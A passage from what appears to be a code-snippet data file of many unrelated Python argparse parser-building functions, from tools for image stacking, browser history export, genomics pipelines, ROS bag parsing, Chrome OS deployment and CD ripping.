metavar=\"beamline_stack_path\",\n help=\"A path pointing at a directory which stores images to be stacked or a path to a stacked image.\")\n parser.add_argument('selected_points',\n metavar=\"x,y\",\n nargs='*',\n help=\"Comma-separated co-ordinates of selected points to be translated from the marked image \"\n \"to the target image.\")\n parser.add_argument('-o','--output',\n metavar=\"focused_image_path\",\n help=\"Specify directory for the stacked image. \"\n \"A file called 'processed.tif' will be created in the directory.\"\n \"'processed.tif' will be created in log directory if this is not set.\")\n parser.add_argument('--config',\n metavar=\"path\",\n action=ReadableConfigDir,\n default=join(self.get_script_path(), readable_config_dir.CONFIG_DIR_NAME),\n help=\"Sets the configuration directory.\")\n parser.add_argument('--scale',\n metavar=\"scale\",\n help=\"The scale between the Formulatrix and beamline image given as the resolution of each \"\n \"image separated by a colon. Note this is relative (1:2 is the same as 2:4) and a value \"\n \"must be specified for each image using the format \"\n \"'[Formulatrix_image_resolution]:[beamline_image_resolution]'.\")\n parser.add_argument('-j', '--job',\n metavar=\"job_id\",\n help=\"Specify a job_id - this will be reported in the output to help identify this run.\")\n parser.add_argument('--to_json',\n action='store_true',\n help=\"Output a JSON object.\")\n parser.add_argument('--version',\n action='version',\n version=VersionHandler.version_string())\n parser.add_argument('--log',\n metavar=\"path\",\n help=\"Write log files to the directory specified by path.\")\n self.parser = parser", "def make_parser():\n parser_ = argparse.ArgumentParser(\n description=\"\"\"\n A tool to retrieve history from\n (almost) any browser on (almost) any platform\n\n██████╗ ██████╗ ██████╗ ██╗ ██╗███████╗███████╗██████╗ ██╗ ██╗██╗███████╗████████╗ ██████╗ ██████╗ ██╗ ██╗\n██╔══██╗██╔══██╗██╔═══██╗██║ ██║██╔════╝██╔════╝██╔══██╗ ██║ ██║██║██╔════╝╚══██╔══╝██╔═══██╗██╔══██╗╚██╗ ██╔╝\n██████╔╝██████╔╝██║ ██║██║ █╗ ██║███████╗█████╗ ██████╔╝█████╗███████║██║███████╗ ██║ ██║ ██║██████╔╝ ╚████╔╝\n██╔══██╗██╔══██╗██║ ██║██║███╗██║╚════██║██╔══╝ ██╔══██╗╚════╝██╔══██║██║╚════██║ ██║ ██║ ██║██╔══██╗ ╚██╔╝\n██████╔╝██║ ██║╚██████╔╝╚███╔███╔╝███████║███████╗██║ ██║ ██║ ██║██║███████║ ██║ ╚██████╔╝██║ ██║ ██║\n╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══╝╚══╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝\n \"\"\", # noqa: E501\n epilog=\"\"\"\n Checkout the GitHub repo\n https://github.com/pesos/browser-history\n if you have any issues or want to help contribute\"\"\",\n formatter_class=RawDescriptionHelpFormatter,\n )\n\n parser_.add_argument(\n \"-t\",\n \"--type\",\n default=\"history\",\n help=f\"\"\"\n argument to decide whether to retrieve history or bookmarks.\n Should be one of {AVAILABLE_TYPES}.\n Default is history.\"\"\",\n )\n parser_.add_argument(\n \"-b\",\n \"--browser\",\n default=\"all\",\n help=f\"\"\"\n browser to retrieve history or bookmarks from. Should be one\n of all, default, {AVAILABLE_BROWSERS}.\n Default is all (gets history or bookmarks from all browsers).\n \"\"\",\n )\n\n parser_.add_argument(\n \"-f\",\n \"--format\",\n default=\"infer\",\n help=f\"\"\"\n Format to be used in output. Should be one of {AVAILABLE_FORMATS}.\n Default is infer (format is inferred from the output file's\n extension. If no output file (-o) is specified, it defaults to csv)\"\"\",\n )\n\n parser_.add_argument(\n \"-o\",\n \"--output\",\n default=None,\n help=\"\"\"\n File where history output or bookmark output is to be written.\n If not provided, standard output is used.\"\"\",\n )\n\n parser_.add_argument(\n \"-p\",\n \"--profile\",\n default=None,\n help=\"\"\"\n Specify the profile from which to fetch history or bookmarks. If\n not provided all profiles are fetched\n \"\"\",\n )\n\n parser_.add_argument(\n \"--show-profiles\",\n default=None,\n metavar=\"BROWSER\",\n help=f\"\"\"\n List all available profiles for a given browser where browser\n can be one of default, {AVAILABLE_BROWSERS}. The browser\n must always be provided.\n \"\"\",\n )\n\n parser_.add_argument(\n \"-v\", \"--version\", action=\"version\", version=\"%(prog)s \" + __version__\n )\n\n return parser_", "def build_parser():\n def commaSplitter(str):\n \"\"\"\n Argparse a comm-seperated list\n \"\"\"\n # leave this here as a reminder of what I should do to make the argument parsing more robust\n\n # if sqrt != int(sqrt):\n # msg = \"%r is not a perfect square\" % string\n # raise argparse.ArgumentTypeError(msg)\n # return value\n return str.split(',')\n\n def existing_file(fname):\n \"\"\"\n Argparse type for an existing file\n \"\"\"\n if not os.path.isfile(fname):\n raise ValueError(\"Invalid file: \" + str(fname))\n return fname\n\n parser = argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument('-p', '--prefix', help='dont really know what this does...',\n action='store', default='patient', dest='prefix')\n parser.add_argument('-d', '--date', help='dont really know what this does...',\n action='store', default='', dest='sampledate')\n parser.add_argument('template', type=argparse.FileType('r'), help='BEAST config template file')\n parser.add_argument('fasta', type=argparse.FileType('r'), help='file of sequences (in FASTA format)')\n\n return parser", "def build_parser ():\n\n parser = argparse.ArgumentParser (description = __doc__)\n\n parser.add_argument (\n '-v', '--verbose', dest='verbose', action='count',\n help='increase output verbosity', default=0\n )\n parser.add_argument (\n '-l', '--live', dest='get_live_data', action='store_true',\n help='get live data from OSM database',\n )\n parser.add_argument (\n '-e', '--edit', action='store_true',\n help='edit the OSM database',\n )\n parser.add_argument (\n '-u', '--user', dest='my_edits', action='store_true',\n help='only report about my edits',\n )\n parser.add_argument (\n '--min-length', dest=\"min_length\", type=float, default=1000.0,\n help='way must be longer than this to get a ref (in m) (default=1000)',\n )\n parser.add_argument (\n '--batch-size', dest=\"batch_size\", type=int, default=10,\n help='apply OSM edits in changesets of this size (default=10)',\n )\n return parser", "def build_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('-r', '--reference', required=True, help=\"Reference Genome URL\")\n parser.add_argument('-n', '--normal', required=True, help='Normal BAM URL. Format: UUID.normal.bam')\n parser.add_argument('-t', '--tumor', required=True, help='Tumor BAM URL. Format: UUID.tumor.bam')\n parser.add_argument('-d', '--dbsnp', required=True, help='dbsnp_132_b37.leftAligned.vcf URL')\n parser.add_argument('-c', '--cosmic', required=True, help='b37_cosmic_v54_120711.vcf URL')\n parser.add_argument('-u', '--mutect', required=True, help='Mutect.jar')\n parser.add_argument('-w', '--work_dir', required=True, help='Where you wanna work from? (full path please)')\n\n return parser", "def buildParser():\n\n parser = argparse.ArgumentParser(\n description='Script to parse bagfile to json file')\n parser.add_argument('-b', '--bag', help='Bag file to read',\n required=True, type=str)\n parser.add_argument('-i', '--include',\n help='list or regex for topics to include',\n required=False, nargs='*')\n parser.add_argument('-e', '--exclude',\n help='list or regex for topics to exclude',\n required=False, nargs='*')\n parser.add_argument('-o', '--output',\n help='name of the output file',\n required=True)\n return parser", "def build_argparser(self):\n firstletters = ''\n for name, (categ, rest) in self.data.items():\n firstletters += name[0]\n\n self.argparser = argparse.ArgumentParser(\n usage='m3 x {} [arguments]'.format(self.name))\n\n for name, (categ, rest) in self.data.items():\n argargs = {}\n if rest.get('help'):\n argargs['help'] = rest['help']\n if rest.get('type') == 'flag':\n argargs['action'] = 'store_true'\n argargs['required'] = False\n elif 'default' not in rest:\n argargs['required'] = True\n if firstletters.count(name[0]) == 1:\n self.argparser.add_argument('-' + name[0],\n '--' + name, **argargs) # noqa: T484\n else:\n self.argparser.add_argument('--' + name, **argargs) # noqa:T484", "def _CreateParser():\n parser = commandline.ArgumentParser(description=__doc__, caching=True)\n\n # TODO(rcui): Have this use the UI-V2 format of having source and target\n # device be specified as positional arguments.\n parser.add_argument('--force', action='store_true', default=False,\n help='Skip all prompts (i.e., for disabling of rootfs '\n 'verification). This may result in the target '\n 'machine being rebooted.')\n sdk_board_env = os.environ.get(cros_chrome_sdk.SDKFetcher.SDK_BOARD_ENV)\n parser.add_argument('--board', default=sdk_board_env,\n help=\"The board the Chrome build is targeted for. When \"\n \"in a 'cros chrome-sdk' shell, defaults to the SDK \"\n \"board.\")\n parser.add_argument('--build-dir', type='path',\n help='The directory with Chrome build artifacts to '\n 'deploy from. Typically of format '\n '<chrome_root>/out/Debug. When this option is used, '\n 'the GYP_DEFINES environment variable must be set.')\n parser.add_argument('--target-dir', type='path',\n default=None,\n help='Target directory on device to deploy Chrome into.')\n parser.add_argument('-g', '--gs-path', type='gs_path',\n help='GS path that contains the chrome to deploy.')\n parser.add_argument('--nostartui', action='store_false', dest='startui',\n default=True,\n help=\"Don't restart the ui daemon after deployment.\")\n parser.add_argument('--nostrip', action='store_false', dest='dostrip',\n default=True,\n help=\"Don't strip binaries during deployment. Warning: \"\n 'the resulting binaries will be very large!')\n parser.add_argument('-p', '--port', type=int, default=remote.DEFAULT_SSH_PORT,\n help='Port of the target device to connect to.')\n parser.add_argument('-t', '--to',\n help='The IP address of the CrOS device to deploy to.')\n parser.add_argument('-v', '--verbose', action='store_true', default=False,\n help='Show more debug output.')\n parser.add_argument('--mount-dir', type='path', default=None,\n help='Deploy Chrome in target directory and bind it '\n 'to the directory specified by this flag.'\n 'Any existing mount on this directory will be '\n 'umounted first.')\n parser.add_argument('--mount', action='store_true', default=False,\n help='Deploy Chrome to default target directory and bind '\n 'it to the default mount directory.'\n 'Any existing mount on this directory will be '\n 'umounted first.')\n\n group = parser.add_argument_group('Advanced Options')\n group.add_argument('-l', '--local-pkg-path', type='path',\n help='Path to local chrome prebuilt package to deploy.')\n group.add_argument('--sloppy', action='store_true', default=False,\n help='Ignore when mandatory artifacts are missing.')\n group.add_argument('--staging-flags', default=None, type=ValidateGypDefines,\n help=('Extra flags to control staging. Valid flags are - '\n '%s' % ', '.join(chrome_util.STAGING_FLAGS)))\n # TODO(stevenjb): Remove --strict entirely once removed from the ebuild.\n group.add_argument('--strict', action='store_true', default=False,\n help='Deprecated. Default behavior is \"strict\". Use '\n '--sloppy to omit warnings for missing optional '\n 'files.')\n group.add_argument('--strip-flags', default=None,\n help=\"Flags to call the 'strip' binutil tool with. \"\n \"Overrides the default arguments.\")\n group.add_argument('--ping', action='store_true', default=False,\n help='Ping the device before connection attempt.')\n group.add_argument('--mash', action='store_true', default=False,\n help='Copy additional files for mus+ash. Will not fit in '\n 'the default target-dir.')\n\n group = parser.add_argument_group(\n 'Metadata Overrides (Advanced)',\n description='Provide all of these overrides in order to remove '\n 'dependencies on metadata.json existence.')\n group.add_argument('--target-tc', action='store', default=None,\n help='Override target toolchain name, e.g. '\n 'x86_64-cros-linux-gnu')\n group.add_argument('--toolchain-url', action='store', default=None,\n help='Override toolchain url format pattern, e.g. '\n '2014/04/%%(target)s-2014.04.23.220740.tar.xz')\n\n # GYP_DEFINES that Chrome was built with. Influences which files are staged\n # when --build-dir is set. Defaults to reading from the GYP_DEFINES\n # enviroment variable. WILL BE DEPRECATED.\n parser.add_argument('--gyp-defines', default=None, type=ValidateGypDefines,\n help=argparse.SUPPRESS)\n\n # GN_ARGS (args.gn) used to build Chrome. Influences which files are staged\n # when --build-dir is set. Defaults to reading from the GN_ARGS env variable.\n # CURRENLY IGNORED, ADDED FOR FORWARD COMPATABILITY.\n parser.add_argument('--gn-args', default=None, type=ValidateGnArgs,\n help=argparse.SUPPRESS)\n\n # Path of an empty directory to stage chrome artifacts to. Defaults to a\n # temporary directory that is removed when the script finishes. If the path\n # is specified, then it will not be removed.\n parser.add_argument('--staging-dir', type='path', default=None,\n help=argparse.SUPPRESS)\n # Only prepare the staging directory, and skip deploying to the device.\n parser.add_argument('--staging-only', action='store_true', default=False,\n help=argparse.SUPPRESS)\n # Path to a binutil 'strip' tool to strip binaries with. The passed-in path\n # is used as-is, and not normalized. Used by the Chrome ebuild to skip\n # fetching the SDK toolchain.\n parser.add_argument('--strip-bin', default=None, help=argparse.SUPPRESS)\n return parser", "def setup_parser():\r\n parser = argparse.ArgumentParser(description='Freeseer Recording Utility',\r\n formatter_class=argparse.RawTextHelpFormatter)\r\n parser.add_argument(\"-v\", \"--version\", action='version',\r\n version=textwrap.dedent('''\\\r\n Freeseer {version} ({platform})\r\n Python {pymajor}.{pyminor}.{pymicro}\r\n PyGst {pygst_version}\r\n PyQt {pyqt_version}\r\n Qt {qt_version}\r\n Yapsy {yapsy_version}\r\n '''.format(version=__version__,\r\n platform=sys.platform,\r\n pymajor=sys.version_info.major,\r\n pyminor=sys.version_info.minor,\r\n pymicro=sys.version_info.micro,\r\n pygst_version=pygst._pygst_version,\r\n pyqt_version=QtCore.PYQT_VERSION_STR,\r\n qt_version=QtCore.QT_VERSION_STR,\r\n yapsy_version=yapsy.__version__)))\r\n\r\n # Configure Subparsers\r\n subparsers = parser.add_subparsers(dest='app', help='Command List')\r\n setup_parser_record(subparsers)\r\n setup_parser_config(subparsers)\r\n setup_parser_talk(subparsers)\r\n setup_parser_report(subparsers)\r\n setup_parser_upload(subparsers)\r\n return parser", "def build_parser() -> ArgumentParser:\n parser = ArgumentParser(prog=\"bartender\")\n parser.add_argument(\"--version\", action=\"version\", version=version(\"bartender\"))\n subparsers = parser.add_subparsers(dest=\"subcommand\")\n\n serve_sp = subparsers.add_parser(\"serve\", help=\"Serve web service\")\n serve_sp.set_defaults(func=serve)\n\n perform_sp = subparsers.add_parser(\"perform\", help=\"Async Redis queue job worker\")\n perform_sp.add_argument(\n \"--config\",\n default=Path(\"config.yaml\"),\n type=Path,\n help=\"Configuration with schedulers that need arq workers\",\n )\n perform_sp.add_argument(\n \"--destination\",\n nargs=\"+\",\n help=\"\"\"Name of destinations to run workers for.\n Each destination must have `scheduler.type:arq`.\n By default runs workers for all destinations with `scheduler.type:arq`.\"\"\",\n dest=\"destination_names\",\n )\n perform_sp.set_defaults(func=perform)\n\n add_generate_token_subcommand(subparsers)\n\n return parser", "def cmdline_parser():\n\n # http://docs.python.org/dev/howto/argparse.html\n parser = argparse.ArgumentParser(description=__doc__)\n \n parser.add_argument(\"--verbose\",\n action=\"store_true\",\n help=\"Be verbose\")\n parser.add_argument(\"--debug\",\n action=\"store_true\",\n help=\"Enable debugging\")\n parser.add_argument(\"-b\", \"--bam\",\n required=True,\n help=\"Input BAM file matching vcf\")\n parser.add_argument(\"-i\", \"--vcf\",\n help=\"Input VCF file containing variants to analyze\"\n \" (clashes with --var)\")\n parser.add_argument(\"-v\", \"--var\",\n help=\"Report reads for this variant only. Format: chr:pos:ref-alt\"\n \" (clashes with --vcf)\")\n default = 0\n parser.add_argument(\"--mq-filter\",\n dest=\"min_mq\",\n type=int,\n default=default,\n help=\"Ignore reads with mapping quality below this value (default=%d)\" % default)\n default = 5\n parser.add_argument(\"--bq-filter\",\n dest=\"min_bq\",\n type=int,\n default=default,\n help=\"Ignore reads with bases below this value (default=%d)\" % default)\n parser.add_argument(\"-a\", \"--use-orphan\",\n action=\"store_true\",\n help=\"Don't ignore orphan-reads / anomalous read-pairs\")\n\n return parser", "def setup_parser(self):\n parser = argparse.ArgumentParser(description=DESCRIPTION)\n parser.add_argument('words', metavar='W', nargs='+', help=POSITIONAL_HELP)\n parser.add_argument('-a','--any', dest=\"search_funct\", action=\"store_const\", \n const='any', default='all', help=SEARCH_HELP)\n parser.add_argument('-o','--only-id', action='store_true', help=ID_HELP)\n parser.add_argument('-u', '--update', action='store_true', help=UPDATE_HELP)\n return parser", "def build_parser(self, add_help=True):\n self.parser = argparse.ArgumentParser(\n description=self.description, add_help=add_help\n )\n self.parser.prog = f\"python -m {self.package}.{self.module_name}\"\n self.parser.add_argument(\n \"config_file\", help=\"Path/name of YAML configuration file for NEMO nowcast.\"\n )", "def _make_parser(self, **kwargs):\n\n kwargs.setdefault('help', self.help)\n kwargs.setdefault('formatter_class',argparse.RawDescriptionHelpFormatter)\n kwargs.setdefault('description', self.description)\n kwargs.setdefault('name', self.name)\n names = (kwargs.get('name') or self.name).split('.')\n \n def _get_subparser(a):\n if a._subparsers:\n for action in a._subparsers._actions:\n if isinstance(action, argparse._SubParsersAction):\n return action\n raise RuntimeError('could not find adequate subparser')\n return a.add_subparsers(dest='command',\n title='commands',\n metavar='COMMAND')\n def _get_parser(node, idx, names):\n name = names[idx]\n if name in node.choices:\n return node.choices[name]\n args = {\n 'name' : name,\n 'help' : 'a group of sub-commands',\n }\n return node.add_parser(**args)\n \n parser = ACMD_PARSER\n node = _get_subparser(parser)\n\n for i,n in enumerate(names[:-1]):\n node = _get_subparser(parser)\n parser = _get_parser(node, i, names)\n \n node = _get_subparser(parser)\n kwargs['name'] = names[-1]\n parser = node.add_parser(**kwargs)\n return parser", "def create_parser():\n parser = argparse.ArgumentParser(\n description='CLI for SMS',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n\n # Add subcommands\n subparsers = parser.add_subparsers(title='subcommands', dest='cmd')\n\n # Downlink Unitdata\n downlink_unitdata_parser = subparsers.add_parser(\n 'DU', help=\"Send downlink unitdata to SMSOrc8rGW service\",\n )\n downlink_unitdata_parser.add_argument('imsi', help='e.g. 001010000090122 (no prefix required)')\n downlink_unitdata_parser.add_argument('data', help='Data as a hex string e.g. 1fc13a00')\n downlink_unitdata_parser.set_defaults(func=send_downlink_unitdata)\n\n return parser", "def create_parser():\n desc_str = (\n \"\"\"Look at the results of inference with cbayes scripts.\"\"\"\n )\n\n parser = argparse.ArgumentParser(description=desc_str)\n \n parser.add_argument('-dir', '--directory',\n help = 'name of the cbayes ouput directory',\n type = str,\n required = True\n )\n \n # do the parsing\n args = parser.parse_args()\n\n return args", "def get_parser():\n parser = ArgumentParser(description=\"Script used to generate Freeplane \"\n + \"mindmap files\")\n\n # This is use when people in Linaro aren't using their email address.\n parser.add_argument('--disable-altname', required=False,\n action=\"store_true\", default=False,\n help=\"Use alternative names (from cfg.yaml) to the tree\")\n\n parser.add_argument('--assignee', required=False,\n action=\"store_true\", default=False,\n help=\"Add assignees (from cfg.yaml) to the tree\")\n\n parser.add_argument('-a', '--author', required=False,\n action=\"store_true\", default=False,\n help=\"If set, git statistic only count the commit \"\n + \"from the author\")\n\n parser.add_argument('-p', '--path', required=False, action=\"store\",\n default=\"/home/jyx/devel/optee_projects/reference/linux\",\n help='Full path to the kernel tree')\n\n parser.add_argument('-s', '--since', required=False, action=\"store\",\n default=None,\n help='Used with the git log --since command')\n\n parser.add_argument('-o', '--output', required=False, action=\"store\",\n default=\"linux-kernel.mm\",\n help='Output filename')\n\n parser.add_argument('-v', required=False, action=\"store_true\",\n default=False,\n help='Output some verbose debugging info')\n\n return parser", "def parse_command_line():\n parser = argparse.ArgumentParser(description='Parses ID\\'s from the DDI compendium search results, and then downloads the html and puts them into a sqlite database.')\n parser.add_argument('-f', '--file', dest='file',\n action='store',\n help='Filenname to be read')\n arg_manager = parser.parse_args()\n return arg_manager", "def command_line():\n version = ' '.join([__version__, __build__])\n parser = ArgumentParser(\n prog='moniker',\n description='Simple batch file renaming tool.',\n )\n parser.add_argument(\n '-v', '--version', action='version',\n version=\"%s v%s\" % (basename(sys.argv[0]), version)\n )\n parser.add_argument(\n '--depth',\n type=int,\n default=0,\n metavar='depth',\n help='Tiers of file heiarcy explored',\n )\n parser.add_argument(\n '--replace',\n nargs=2,\n default=('', ''),\n metavar='replace',\n help='glob pattern to match'\n )\n parser.add_argument(\n 'directory',\n default='.',\n help='target directory root',\n )\n return parser", "def makeParser():\n parser = argparse.ArgumentParser(\n description=(\n \"Print a JSON object containing reference to read \"\n \"distances extracted from a SAM file.\"\n )\n )\n\n parser.add_argument(\n \"--samFile\",\n action=\"append\",\n required=True,\n help=\"The SAM file(s) to load. May be repeated.\",\n )\n\n parser.add_argument(\n \"--minMatchingReads\",\n type=int,\n help=(\n \"The minimum number of reads that must match a reference for it \"\n \"to be included.\"\n ),\n )\n\n parser.add_argument(\n \"--scoreTag\",\n help=(\n \"The score tag to use for the alignment score. If not given, \"\n \"1 will be used to indicate that a read matched a reference \"\n \"(non-matches are not included). The default is no score tag, \"\n 'which is not that useful. A good choice is \"AS\", for the '\n \"alignment score, but that has to be present in the SAM file, \"\n \"which means that the aligner (bowtie2, bwa, etc. has to have \"\n \"produced such a tag.\"\n ),\n )\n\n parser.add_argument(\n \"--verbose\", action=\"store_true\", help=\"Print extra information.\"\n )\n\n return parser", "def create_parser():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('manga_name',\n type = str,\n help = \"Input the name of the manga.\"\n )\n parser.add_argument('-b','--begin',\n type = int,\n help = 'Input the starting chapter.Defaults to first chapter.'\n )\n parser.add_argument('-e','--end',\n type = int,\n help = 'Input the ending chapter.Defaults to the last possible chapter.'\n )\n parser.add_argument('-c','--chapter',\n type = int,\n help = 'Provide if you want to download only one chapter.'\n )\n parser.add_argument('-t','--target',\n type = str,\n help = 'The location where manga has to be downloaded.Defaults to the current directory.',\n default = '.'\n )\n parser.add_argument('-s','--site',\n type = str,\n help = 'The site through which the manga has to be downloaded. Defaults to MangaPanda.',\n default = 'mangapanda'\n )\n\n return parser", "def build_parser():\n # Inherit package arguments\n parents = sisr.bin.build_parser(),\n\n parser = argparse.ArgumentParser(\n description=\"Test SiSR super-resolution network\",\n parents=parents)\n\n return parser", "def _create_parser(self):\n default_options = self._create_defaults()\n\n all_categories = ['build', 'whitespace']\n\n mock_stderr = self._MockStdErr()\n\n return ArgumentParser(\n all_categories=all_categories,\n base_filter_rules=[],\n default_options=default_options,\n mock_stderr=mock_stderr,\n usage='test usage')", "def build_args():\n parser = argparse.ArgumentParser(description='Validates, edits, or creates a 22 XML file')\n subparsers = parser.add_subparsers(help='sub-command help')\n \n add_branch_parser(subparsers)\n add_edit_parser(subparsers)\n add_finalize_parser(subparsers)\n add_grade_parser(subparsers)\n add_new_parser(subparsers)\n add_validate_parser(subparsers)\n add_validate_document_parser(subparsers)\n \n return parser.parse_args()", "def generate_main_parser() -> ArgumentParser:\n # Create parser\n parser = ArgumentParser(\n description=\"Command line interface tool for iic2343.\",\n )\n\n # Add version flag\n parser.add_argument(\n \"-v\",\n \"--version\",\n action=\"version\",\n version=f\"iic2343 version {iic2343.__version__}\",\n )\n\n # Create subparsers\n subparsers = parser.add_subparsers(help=\"Action to be executed.\")\n\n # Serial ports subparser\n generate_serial_ports_subparser(subparsers)\n\n return parser", "def build_parser():\n parser = argparse.ArgumentParser(description='Bag reader')\n parser.add_argument('-b', '--bag',\n help='Bag files to read',\n required=True,\n nargs='+',\n type=str)\n parser.add_argument('-i', '--info',\n help='List topics and fields within topics',\n required=False,\n action='store_true')\n parser.add_argument('-s', '--stats',\n help='Display how many messages were published on each topic',\n required=False,\n action='store_true')\n parser.add_argument('-t', '--topic',\n help='Topics to write to csv file',\n required=False,\n action='store',\n nargs='+',\n type=str)\n parser.add_argument('-o', '--output_file',\n help='Output file name',\n required=False,\n action='store',\n nargs='+',\n dest='out_file',\n type=str)\n\n return parser", "def cmd_line_parser():\n usage = \"usage: %prog [options]\\n\"\n opt_parser = OptionParser(usage=usage)\n opt_parser.add_option(\"--ai\", action=\"store\", dest=\"alternative_input\",\n help=\"an alternative input file (works only with load_from_pickle)\")\n opt_parser.add_option(\"--dl\", action=\"store\", dest=\"dumped_lexicon\",\n help=\"a dumped lexicon file (works only with load_from_pickle\")\n opt_parser.add_option(\"--dotest\", action=\"store_true\", dest=\"dotest\", default=False,\n help=\"use this flag if you want to apply testing\")\n opt_parser.add_option(\"-t\", action=\"store\", dest=\"test_parses\",\n help=\"the output file for the test parses\")\n opt_parser.add_option(\"-n\", action=\"store\", dest=\"train_parses\",\n help=\"the output file for the train parses\")\n opt_parser.add_option(\"-i\", dest=\"inp_file\", default=\"trainFiles/trainPairs\",\n help=\"the input file names (with the annotated corpus)\")\n opt_parser.add_option(\"--devel\", dest=\"development_mode\", default=False, action=\"store_true\",\n help=\"development mode\")\n\n return opt_parser", "def get_parser(self):\n parser = ArgumentParser()\n parser.add_argument(\n \"-c\", default='', dest='cmd',\n help=(\"just like python -c or sh -c (pass in a command)\"))\n parser.add_argument(\n \"-e\", \"--exec\", default='', dest='execfile',\n help='a filename to execute')\n parser.add_argument(\n \"-v\", '--version', default=False, dest='version',\n action='store_true',\n help=(\"show version information\"))\n parser.add_argument(\"--shell\", dest=\"shell\",\n default=False, help=\"application shell\",\n action='store_true')\n parser.add_argument(\"--config\", dest='config',\n default=\"\",\n help=\"use config file\")\n return parser", "def build_parser():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(help='Blogstrap commands')\n init_parser = subparsers.add_parser(\n 'init',\n help='Initialize the Blogstrap directory')\n init_parser.set_defaults(func=init)\n init_parser.add_argument('-t', '--target',\n dest='target',\n type=str,\n default='.',\n help='Target folder to generate files in')\n init_parser.add_argument('--no-homepage',\n action='store_true',\n default=False,\n help='if specified, no homepage will be created')\n run_parser = subparsers.add_parser(\n 'run', help=\"Run the Flask development server\")\n run_parser.set_defaults(func=run)\n run_parser.add_argument('-c', '--config',\n dest='config',\n type=str,\n default=None,\n help='path to a config file')\n\n return parser", "def get_command_line_parser():\n command_line_parser = argparse.ArgumentParser(\n description=\"Execute data workflows defined in flo.yaml files\",\n )\n subcommand_creator = command_line_parser.add_subparsers(\n title='SUBCOMMANDS',\n )\n for command_module in COMMAND_MODULES:\n command = command_module.Command(subcommand_creator)\n\n # this sets a default value for the command \"option\" so\n # that, when this Command is selected by argparse from the\n # command line, we know which comman instance it\n # corresponds with. See run_subcommand function below.\n command.option_parser.set_defaults(command=command)\n return command_line_parser", "def generate_parser(renamer):\n parser = ShlexArgumentParser(\n formatter_class=RawDescriptionHelpFormatter,\n prog=\"brp\",\n usage=\"cmd [args ...]\",\n add_help=False,\n exit_on_error=False,\n )\n subparsers = parser.add_subparsers(\n title=\"commands\",\n description=\"actions to take on the filenames\",\n )\n\n _help = [\n _help_parser((\"help\", \"h\", \"?\"), subparsers, renamer),\n _save_parser((\"save\", \"s\"), subparsers, renamer),\n _quit_parser((\"quit\", \"q\", \"exit\"), subparsers, renamer),\n _save_quit_parser((\"write\", \"w\"), subparsers, renamer),\n _print_parser((\"list\", \"ls\", \"l\"), subparsers, renamer),\n _history_parser((\"history\", \"hist\", \"past\"), subparsers, renamer),\n _undo_parser((\"undo\", \"u\"), subparsers, renamer),\n _reset_parser((\"reset\", \"over\", \"o\"), subparsers, renamer),\n _automate_parser((\"automate\", \"a\", \"auto\"), subparsers, renamer),\n _find_replace_parser((\"replace\", \"r\", \"re\", \"reg\", \"regex\"), subparsers, renamer),\n _append_parser((\"append\", \"ap\"), subparsers, renamer),\n _prepend_parser((\"prepend\", \"p\", \"pre\"), subparsers, renamer),\n _insert_parser((\"insert\", \"i\", \"in\"), subparsers, renamer),\n _case_parser((\"case\", \"c\"), subparsers, renamer),\n _extension_parser((\"extension\", \"x\", \"ext\"), subparsers, renamer),\n ]\n\n return parser, _help", "def get_argument_parser(self):\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(dest='command')\n fetch_parser = subparsers.add_parser('fetch', help='fetches and displays a release from discogs')\n fetch_parser.add_argument('discogs_id', help='the ID of the release')\n rip_parser = subparsers.add_parser('rip', help='rips the current CD to WAV')\n rip_parser.add_argument('--destination', help='optional destination for the CD rip')\n search_parser = subparsers.add_parser(\n 'search',\n prog='search',\n help='performs a very simple search on discogs')\n search_parser.add_argument('term', help='the term to search for')\n encode_parser = subparsers.add_parser(\n 'encode', help='Encodes a CD or a set of WAV files to mp3.')\n encode_parser.add_argument(\n 'encoding_from', choices=['cd', 'wav'], help='The source to encode from.')\n encode_parser.add_argument(\n 'encoding_to', choices=['mp3', 'flac'], help='The destination to encode to.')\n encode_parser.add_argument(\n '--source', help='The destination of the source wav file. This can be a file or directory.')\n encode_parser.add_argument(\n '--destination', help='The destination of the resulting mp3 or flac. This can be a file or directory.')\n encode_parser.add_argument(\n '--keep-source', action='store_true', help='If encoding from wav, use this to keep the original wav being removed.')\n encode_parser.add_argument(\n '--collapse-index-tracks', action='store_true', help='If set this will collapse any subtracks to a single track.')\n encode_parser.add_argument(\n '--discogs-id', help='The discogs ID for the release. When this is used metadata from the discogs release will be applied to the encoded files.')\n decode_parser = subparsers.add_parser('decode', help='Decodes a set of FLAC or MP3 files to WAV.')\n decode_parser.add_argument(\n 'decode_from', choices=['flac', 'mp3'], help='The source to decode from.')\n decode_parser.add_argument(\n '--source', help='The destination of the source file. This can be a file or directory.')\n decode_parser.add_argument(\n '--destination', help='The destination of the resulting wav. This can be a file or directory.')\n tag_parser = subparsers.add_parser('tag', help='Tags an audio file')\n tag_parser.add_argument(\n 'action', choices=['add', 'remove'], help='The tagging action to be performed. A tag can be added or removed.')\n tag_parser.add_argument(\n 'format', choices=['mp3', 'flac'], help='The file format of the audio file being tagged.')\n tag_parser.add_argument(\n '--collapse-index-tracks', action='store_true', help='If set this will collapse any subtracks to a single track.')\n tag_parser.add_argument(\n '--source',\n help='The source audio files to tag. This can be a file or a directory. If the source is omitted, the files in the current working directory will be used.')\n tag_parser.add_argument('--discogs-id', help='The discogs ID for the release. When this is used metadata from the discogs release will be applied to the tagged files.')\n tag_parser.add_argument('--artist', help='The artist to use for the tag.')\n tag_parser.add_argument('--album-artist', help='The album artist to use for the tag.')\n tag_parser.add_argument('--album', help='The album to use for the tag.')\n tag_parser.add_argument('--title', help='The title to use for the tag.')\n tag_parser.add_argument('--year', help='The year to use for the tag.')\n tag_parser.add_argument('--genre', help='The year to use for the tag.')\n tag_parser.add_argument('--track-number', help='The track number to use for the tag.')\n tag_parser.add_argument('--track-total', help='The track total to use for the tag.')\n tag_parser.add_argument('--disc-number', help='The disc number to use for the tag.')\n tag_parser.add_argument('--disc-total', help='The disc total to use for the tag.')\n tag_parser.add_argument('--comment', help='The comment for the tag.')\n artwork_parser = 